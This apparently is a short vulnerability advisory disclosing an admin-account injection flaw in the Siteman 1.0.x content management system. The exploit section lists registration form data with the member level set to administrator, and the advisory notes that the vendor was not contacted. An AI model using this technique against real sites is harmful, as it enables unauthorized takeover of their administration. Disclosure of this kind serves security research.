God Admin Injection Vulnerability in Siteman 1.0.x, Discovered by PersianHacker.NET Security Team by amironline452 (amironline452 hotmail com) http://www.PersianHacker.NET http://www.amironline452.tk Siteman is a Content Management System (CMS) that is so easy to install and use, that a person who has no knowledge about creating homepages can get a profesionally looking website up and running in just minutes. More info @ http://sitem.sourceforge.net/ http://sourceforge.net/projects/sitem/ Discussion: With this Vulnerability you can create God Admin user in Siteman v1.0.x. Exploiet: These data were recorded.

Username(Use this, and not your display name, when logging in)	amir452
Password
Secret Question (Asked when you forget your password)	amir452
Answer to secret question
Display name	amir452
Member Level	5 (Admin)
email	amir452@amir452.com
Hide my email adress	no
Forum Signature	hackers

Is this correct?

the above exploiet creat God Admin user with folowing info: username: amir452 password: amir452 Note: Script authors not contacted. There is no solution at this time.